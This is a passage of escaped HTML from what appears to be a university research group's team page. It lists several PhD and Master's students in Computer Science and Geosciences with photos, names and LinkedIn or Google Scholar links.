class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassani</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=9KRgkCcAAAAJ&amp;hl=en&amp;oi=ao\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c140-outer\">\n            <div data-colibri-id=\"182-c140\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c140 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c141\" class=\"d-block style-854 style-local-182-c141 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c141-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c141-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-850 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c143\" class=\"h-text h-text-component style-851 style-local-182-c143 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c144\" class=\"h-text h-text-component style-902 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"style-855 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c242-outer\">\n            <div data-colibri-id=\"182-c242\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c242 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c243\" class=\"d-block style-854 style-local-182-c243 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Siv-photo.jpg\" class=\"wp-image-1860 style-854-image style-local-182-c243-image\">\n                      <div class=\"h-image__frame 